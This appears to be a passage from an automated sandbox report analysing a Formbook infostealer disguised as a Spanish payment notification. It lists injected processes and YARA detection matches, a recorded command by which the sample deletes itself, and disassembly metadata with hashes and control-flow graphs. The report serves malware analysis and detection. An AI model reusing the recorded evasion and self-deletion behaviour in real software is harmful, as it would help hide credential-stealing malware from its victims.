                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Target ID:14
                                            Start time:16:45:52
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\WWAHost.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                            Imagebase:0x1120000
                                            File size:829856 bytes
                                            MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Target ID:15
                                            Start time:16:45:57
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
                                            Imagebase:0xc20000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:16
                                            Start time:16:45:58
                                            Start date:13/05/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7c9170000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:12.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:93
                                              Total number of Limit Nodes:5
                                              execution_graph 18116 2f1bcb0 GetCurrentProcess 18117 2f1bd23 18116->18117 18118 2f1bd2a GetCurrentThread 18116->18118 18117->18118 18119 2f1bd60 18118->18119 18120 2f1bd67 GetCurrentProcess 18118->18120 18119->18120 18121 2f1bd9d 18120->18121 18122 2f1bdc5 GetCurrentThreadId 18121->18122 18123 2f1bdf6 18122->18123 18208 2f198d0 18211 2f199c8 18208->18211 18209 2f198df 18212 2f199db 18211->18212 18213 2f199f3 18212->18213 18219 2f19c50 18212->18219 18223 2f19c40 18212->18223 18213->18209 18214 2f199eb 18214->18213 18215 2f19bf0 GetModuleHandleW 18214->18215 18216 2f19c1d 18215->18216 18216->18209 18220 2f19c64 18219->18220 18221 2f19c89 18220->18221 18227 2f18cf0 18220->18227 18221->18214 18224 2f19c50 18223->18224 18225 2f19c89 18224->18225 18226 2f18cf0 LoadLibraryExW 18224->18226 18225->18214 18226->18225 18228 2f19e30 LoadLibraryExW 18227->18228 18230 2f19ea9 18228->18230 18230->18221 18124 2f140e8 18125 2f14104 18124->18125 18126 2f14134 18125->18126 18130 2f14302 18125->18130 18135 2f13f24 18126->18135 18131 2f14325 18130->18131 18139 2f14400 18131->18139 18143 2f143f2 18131->18143 18136 2f13f2f 18135->18136 18151 2f15644 18136->18151 18138 2f16bae 18141 2f14427 18139->18141 18140 2f14504 18140->18140 18141->18140 18147 2f14074 18141->18147 18145 2f143fb 18143->18145 18144 2f14504 18144->18144 18145->18144 18146 2f14074 CreateActCtxA 18145->18146 18146->18144 18148 2f15890 CreateActCtxA 18147->18148 18150 2f15953 18148->18150 18150->18150 18152 2f1564f 18151->18152 18155 2f15674 18152->18155 18154 2f16ded 18154->18138 18156 2f1567f 18155->18156 18159 2f156a4 18156->18159 18158 2f16ec2 18158->18154 18160 2f156af 18159->18160 18163 2f16f20 18160->18163 18162 2f173d2 18162->18158 18164 2f16f2b 18163->18164 18165 2f17b1c 18164->18165 18167 2f1b9d9 18164->18167 18165->18162 18168 2f1ba09 18167->18168 18169 2f1ba2d 18168->18169 18172 2f1bb98 18168->18172 18176 2f1bb88 18168->18176 18169->18165 18174 2f1bba5 18172->18174 18173 2f1bbdf 18173->18169 18174->18173 18180 2f1a66c 18174->18180 18178 2f1bb98 18176->18178 18177 2f1bbdf 18177->18169 18178->18177 18179 2f1a66c 2 API calls 18178->18179 18179->18177 18181 2f1a677 18180->18181 18183 2f1c8d8 18181->18183 18184 2f1a730 18181->18184 18183->18183 18185 2f1a73b 18184->18185 18186 2f16f20 2 API calls 18185->18186 18187 2f1c947 18186->18187 18191 2f1e6b8 18187->18191 18199 2f1e6d0 18187->18199 18188 2f1c980 18188->18183 18192 2f1e6d0 18191->18192 18193 2f1e70d 18192->18193 18194 2f1e6d0 LoadLibraryExW GetModuleHandleW 18192->18194 18195 2f1e6b8 LoadLibraryExW GetModuleHandleW 18192->18195 18196 2f1e73f 18192->18196 18193->18188 18194->18196 18195->18196 18197 2f1eb50 LoadLibraryExW GetModuleHandleW 18196->18197 18198 2f1eb40 LoadLibraryExW GetModuleHandleW 18196->18198 18197->18193 18198->18193 18201 2f1e701 18199->18201 18202 2f1e74d 18199->18202 18200 2f1e70d 18200->18188 18201->18200 18205 2f1e6d0 LoadLibraryExW GetModuleHandleW 18201->18205 18206 2f1e6b8 LoadLibraryExW GetModuleHandleW 18201->18206 18207 2f1e73f 18201->18207 18202->18188 18203 2f1eb50 LoadLibraryExW GetModuleHandleW 18203->18202 18204 2f1eb40 LoadLibraryExW GetModuleHandleW 18204->18202 18205->18207 18206->18207 18207->18203 18207->18204 18231 2f1bed8 DuplicateHandle 18232 2f1bf6e 18231->18232

                                              Executed Functions

                                              Function 076A4F58 Relevance: .9, Instructions: 887COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 27e057f15b1302d49affe0cbb93c0974b3eba9aa89076c71b7047fa1f6e1f783
                                              • Instruction ID: b0822131f9d91a702866e906049d4fd6308100a4fee1eb8b3af4feb1cfdc12a8
                                              • Opcode Fuzzy Hash: 27e057f15b1302d49affe0cbb93c0974b3eba9aa89076c71b7047fa1f6e1f783
                                              • Instruction Fuzzy Hash: D07250B0A001199FCB14DF69C884AAEBBB2BF89304F158169E907EB356DB30DD51CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076A5CA8 Relevance: .9, Instructions: 884COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e5e9ae1726a0a09963e23bb0dd035ff91fc727ac92e8f071fb14ba5f02c901a
                                              • Instruction ID: 653c1305d72e361ccc2805439158d3237422cc6dda1fc00676c151e13112b10e
                                              • Opcode Fuzzy Hash: 8e5e9ae1726a0a09963e23bb0dd035ff91fc727ac92e8f071fb14ba5f02c901a
                                              • Instruction Fuzzy Hash: B4824BB4A1420AEFCB14CF68C584AAEBBF2BF48304F198559E9169B3A1D730ED45CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076A2113 Relevance: .6, Instructions: 553COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1411 76a2113-76a2117 1412 76a2118-76a212d 1411->1412 1413 76a2abc-76a2ac6 1411->1413 1412->1413 1414 76a212e-76a2139 1412->1414 1416 76a213f-76a214b 1414->1416 1417 76a2157-76a2166 1416->1417 1419 76a21c5-76a21c9 1417->1419 1420 76a21cf-76a21d8 1419->1420 1421 76a2271-76a22db 1419->1421 1422 76a21de-76a21f4 1420->1422 1423 76a20d3-76a20df 1420->1423 1421->1413 1458 76a22e1-76a29f0 1421->1458 1429 76a2246-76a2258 1422->1429 1430 76a21f6-76a21f9 1422->1430 1423->1413 1425 76a20e5-76a20f1 1423->1425 1427 76a2168-76a216e 1425->1427 1428 76a20f3-76a2107 1425->1428 1427->1413 1431 76a2174-76a218c 1427->1431 1428->1427 1437 76a2109-76a2112 1428->1437 1441 76a29fb-76a2ab1 1429->1441 1442 76a225e-76a226e 1429->1442 1430->1413 1433 76a21ff-76a223c 1430->1433 1431->1413 1440 76a2192-76a21ba 1431->1440 1433->1421 1454 76a223e-76a2244 1433->1454 1437->1411 1440->1419 1441->1413 1454->1429 1454->1430 1458->1441
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c90aa15bcabda9f22034f4ef898f2ef9c76dcabb20f244453f259defb2df24ef
                                              • Instruction ID: adbb8541b495bce23c36825a285da099ced30f884ea4328276759f26584f99c4
                                              • Opcode Fuzzy Hash: c90aa15bcabda9f22034f4ef898f2ef9c76dcabb20f244453f259defb2df24ef
                                              • Instruction Fuzzy Hash: D352C674A051198FCB64DB64C895AEEB7B2FF89304F1141E9D50AA7764CF30AE81CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076A9AE0 Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 99e1eab3fe8d7aaa5134e4477af46799b3c11e872cb27da0086a40d99cc9dbef
                                              • Instruction ID: 32a98c33fd93367c734b3d9fe947f02b508cfc6e40ce0236d107070507d3b0cd
                                              • Opcode Fuzzy Hash: 99e1eab3fe8d7aaa5134e4477af46799b3c11e872cb27da0086a40d99cc9dbef
                                              • Instruction Fuzzy Hash: 48D1E735C2575A8ACB10EB74C990A9DB771FFA5300F60879AE90977214EF706AC8CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F1BCA1 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 02F1BD10
                                              • GetCurrentThread.KERNEL32 ref: 02F1BD4D
                                              • GetCurrentProcess.KERNEL32 ref: 02F1BD8A
                                              • GetCurrentThreadId.KERNEL32 ref: 02F1BDE3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: f098cf030c7220c994296554556dc2378f622b0faffda86d9e3b5c69fe94bffd
                                              • Instruction ID: b24d0000729a1fd55ff9d0d6c4eccb6469679e2a0df7c8c31c19df90f47bb59d
                                              • Opcode Fuzzy Hash: f098cf030c7220c994296554556dc2378f622b0faffda86d9e3b5c69fe94bffd
                                              • Instruction Fuzzy Hash: 9A5176B0904209CFDB14CFA9D6487EEBBF1FF88318F208459E509A33A0DB745984CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F1BCB0 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 02F1BD10
                                              • GetCurrentThread.KERNEL32 ref: 02F1BD4D
                                              • GetCurrentProcess.KERNEL32 ref: 02F1BD8A
                                              • GetCurrentThreadId.KERNEL32 ref: 02F1BDE3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: d5f2aa8167402f186c06900a3930636c18582c705897ce42d7b0d9e7ec557bee
                                              • Instruction ID: 0c2b8bb2f56667a8d2358c69bab965e6e056ea0aa759d0cc11a2605a40786cc7
                                              • Opcode Fuzzy Hash: d5f2aa8167402f186c06900a3930636c18582c705897ce42d7b0d9e7ec557bee
                                              • Instruction Fuzzy Hash: EF5144B0904249CFDB14CFA9D648BEEBBF1BF48318F208459E549A73A0DB745984CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F199C8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02F19C0E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 3e21d9348374a278b27b151cc64c519c79dbb1ba47ef3f8ac6bea925b4291815
                                              • Instruction ID: 1fcc22b0f9b1f1aa405aff01eebb1a25aee3cb6afc2bc6cb42fb5d552fa5bba3
                                              • Opcode Fuzzy Hash: 3e21d9348374a278b27b151cc64c519c79dbb1ba47ef3f8ac6bea925b4291815
                                              • Instruction Fuzzy Hash: 1F713570A00B058FDB24CF2AD55175ABBF1FF88284F408A2ED58AD7A50D775E849CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F14074 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 98 2f14074-2f15951 CreateActCtxA 101 2f15953-2f15959 98->101 102 2f1595a-2f159b4 98->102 101->102 109 2f159c3-2f159c7 102->109 110 2f159b6-2f159b9 102->110 111 2f159c9-2f159d5 109->111 112 2f159d8 109->112 110->109 111->112 114 2f159d9 112->114 114->114
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 02F15941
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: a91315d4bf192711d514d730b0c037e1bffeb7dc9cc49ea553dfa78fbb647d41
                                              • Instruction ID: 46c416607bd3861108ad0b20f47cc0523fb95af9cea7f9469deb6052cdb9b110
                                              • Opcode Fuzzy Hash: a91315d4bf192711d514d730b0c037e1bffeb7dc9cc49ea553dfa78fbb647d41
                                              • Instruction Fuzzy Hash: BC410271D0431CCBDB20CFA9C984BCEBBB5BF88314FA0805AD508AB254DB756946CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F15886 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 115 2f15886-2f15951 CreateActCtxA 117 2f15953-2f15959 115->117 118 2f1595a-2f159b4 115->118 117->118 125 2f159c3-2f159c7 118->125 126 2f159b6-2f159b9 118->126 127 2f159c9-2f159d5 125->127 128 2f159d8 125->128 126->125 127->128 130 2f159d9 128->130 130->130
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 02F15941
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 96276e5a7c9a8efe351926f8b44626b300f5ebe5f20d6190a29bdbf36d53b0e7
                                              • Instruction ID: fad87f2e867dd8322e33d0190c569ba4d8fd75c9be22d1e2102f4435574ca558
                                              • Opcode Fuzzy Hash: 96276e5a7c9a8efe351926f8b44626b300f5ebe5f20d6190a29bdbf36d53b0e7
                                              • Instruction Fuzzy Hash: 25411471D04218CFDB24CFA9C984BCEBBB1BF88308FA0805AD508AB254DB756946CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F1BED0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 131 2f1bed0-2f1bed3 132 2f1bed8-2f1bf6c DuplicateHandle 131->132 133 2f1bf75-2f1bf92 132->133 134 2f1bf6e-2f1bf74 132->134 134->133
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F1BF5F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 56cd1ef5ba0e97fa72834eed8a6b8c76bf039a6775f77c1fddb41b061cb31b6a
                                              • Instruction ID: a3f4cc2f308d1e2695db4a76ac111cb30551317de1265ad46daa997fbda18f5c
                                              • Opcode Fuzzy Hash: 56cd1ef5ba0e97fa72834eed8a6b8c76bf039a6775f77c1fddb41b061cb31b6a
                                              • Instruction Fuzzy Hash: 0121E6B5904248EFDB10CF99D984ADEBFF8FB48324F14841AE914A3310D378A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F1BED8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 137 2f1bed8-2f1bf6c DuplicateHandle 138 2f1bf75-2f1bf92 137->138 139 2f1bf6e-2f1bf74 137->139 139->138
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F1BF5F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 9b612c8209854292b57bb5ffe3ef415d1cb85754761b82a574cc198977166196
                                              • Instruction ID: d04be96193f368f43bcb4fe1ed3ca1e1b16547d0b79d2b3a68d35ded2515c5e3
                                              • Opcode Fuzzy Hash: 9b612c8209854292b57bb5ffe3ef415d1cb85754761b82a574cc198977166196
                                              • Instruction Fuzzy Hash: E021C4B5905248EFDB10CFAAD984ADEBFF8FB48324F14841AE914A3350D374A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F18CF0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 142 2f18cf0-2f19e70 144 2f19e72-2f19e75 142->144 145 2f19e78-2f19ea7 LoadLibraryExW 142->145 144->145 146 2f19eb0-2f19ecd 145->146 147 2f19ea9-2f19eaf 145->147 147->146
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F19C89,00000800,00000000,00000000), ref: 02F19E9A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 17923413fc53bd9f662a8b3a83cda7016bbef1bdc7fdca2a264931e990e021bf
                                              • Instruction ID: b76b8e3ac79b90d27077fe6e1607ea13de9a92f2c5d1c2dd60e35c61de2eb2f4
                                              • Opcode Fuzzy Hash: 17923413fc53bd9f662a8b3a83cda7016bbef1bdc7fdca2a264931e990e021bf
                                              • Instruction Fuzzy Hash: BC1114B2D042089FCB10CF9AC544BDEFBF5EB88354F44842ED919A7210C3B4A945CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F19E28 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 150 2f19e28-2f19e70 151 2f19e72-2f19e75 150->151 152 2f19e78-2f19ea7 LoadLibraryExW 150->152 151->152 153 2f19eb0-2f19ecd 152->153 154 2f19ea9-2f19eaf 152->154 154->153
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F19C89,00000800,00000000,00000000), ref: 02F19E9A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 7fc1bfa8427ac1fa3393273c081821aae1b6cba4726cf7a32c9c957a4520587d
                                              • Instruction ID: ba44e0c227c3dc8050133df06d032cfad52c30ee7d747dd90899e55a08bacf7a
                                              • Opcode Fuzzy Hash: 7fc1bfa8427ac1fa3393273c081821aae1b6cba4726cf7a32c9c957a4520587d
                                              • Instruction Fuzzy Hash: 741114B6D042089FCB10CF99C988BDEFBF4AB48354F14841AD919B7210C374A549CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F19BA8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 157 2f19ba8-2f19be8 158 2f19bf0-2f19c1b GetModuleHandleW 157->158 159 2f19bea-2f19bed 157->159 160 2f19c24-2f19c38 158->160 161 2f19c1d-2f19c23 158->161 159->158 161->160
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02F19C0E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 8c4e49dde505b2ebdc7856f138eeb63da47f4f02b2a6955cc5416aced9f2f4a3
                                              • Instruction ID: 9207ee165fb9f54ac2f4db4409ec7c7645c6d80eee5e28309d8ad80d750451d0
                                              • Opcode Fuzzy Hash: 8c4e49dde505b2ebdc7856f138eeb63da47f4f02b2a6955cc5416aced9f2f4a3
                                              • Instruction Fuzzy Hash: 741110B2D002498FCB10CF9AC544BDEFBF4EB88324F14842AD959A7310D3B8A549CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076A32A6 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 163 76a32a6-76a32c7 177 76a32cd call 76a3430 163->177 178 76a32cd call 76a3421 163->178 164 76a32d4-76a32e7 166 76a32f0-76a3308 164->166 168 76a333a-76a3343 166->168 169 76a330a-76a3328 166->169 171 76a3346-76a3371 168->171 170 76a332a-76a3330 169->170 169->171 172 76a3332 170->172 173 76a3337 170->173 172->173 173->168 177->164 178->164
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: E
                                              • API String ID: 0-3568589458
                                              • Opcode ID: 7a34d872194afe0c72a68a4da48ab2cf9e8362ec5514482e4a2610ec0d3b2382
                                              • Instruction ID: 5f9f6848587440124bb0810c6c387a1a67c61f9ec6b618df748aaa12bdcbb8b8
                                              • Opcode Fuzzy Hash: 7a34d872194afe0c72a68a4da48ab2cf9e8362ec5514482e4a2610ec0d3b2382
                                              • Instruction Fuzzy Hash: 8221CEB4E0425A8FCF41DFA8C4819EEBBF1BF09315F2044A9D405AB345E735AD45CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076A6D80 Relevance: .8, Instructions: 792COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1004 76a6d80-76a726e 1079 76a77c0-76a77e0 1004->1079 1080 76a7274-76a7284 1004->1080 1084 76a7809-76a781f 1079->1084 1085 76a77e2-76a77f5 1079->1085 1080->1079 1081 76a728a-76a729a 1080->1081 1081->1079 1083 76a72a0-76a72b0 1081->1083 1083->1079 1086 76a72b6-76a72c6 1083->1086 1097 76a7821-76a782b 1084->1097 1098 76a7896-76a78a2 1084->1098 1087 76a7801-76a7808 1085->1087 1088 76a77f7-76a77fc 1085->1088 1086->1079 1089 76a72cc-76a72dc 1086->1089 1087->1084 1092 76a78e6-76a78eb 1088->1092 1089->1079 1091 76a72e2-76a72f2 1089->1091 1091->1079 1093 76a72f8-76a7308 1091->1093 1093->1079 1096 76a730e-76a731e 1093->1096 1096->1079 1099 76a7324-76a7334 1096->1099 1097->1098 1104 76a782d-76a7839 1097->1104 1105 76a78b9-76a78c5 1098->1105 1106 76a78a4-76a78b0 1098->1106 1099->1079 1100 76a733a-76a734a 1099->1100 1100->1079 1102 76a7350-76a77bf 1100->1102 1113 76a783b-76a7846 1104->1113 1114 76a785e-76a7861 1104->1114 1111 76a78dc-76a78de 1105->1111 1112 76a78c7-76a78d3 1105->1112 1106->1105 1116 76a78b2-76a78b7 1106->1116 1111->1092 1112->1111 1125 76a78d5-76a78da 1112->1125 1113->1114 1127 76a7848-76a7852 1113->1127 1117 76a7878-76a7884 1114->1117 1118 76a7863-76a786f 1114->1118 1116->1092 1120 76a78ec-76a78f8 1117->1120 1121 76a7886-76a788d 1117->1121 1118->1117 1128 76a7871-76a7876 1118->1128 1131 76a78fa-76a7921 1120->1131 1132 76a7922-76a793b call 76a7ac0 1120->1132 1121->1120 1126 76a788f-76a7894 1121->1126 1125->1092 1126->1092 1127->1114 1134 76a7854-76a7859 1127->1134 1128->1092 1131->1132 1138 76a7941-76a7948 1132->1138 1134->1092 1139 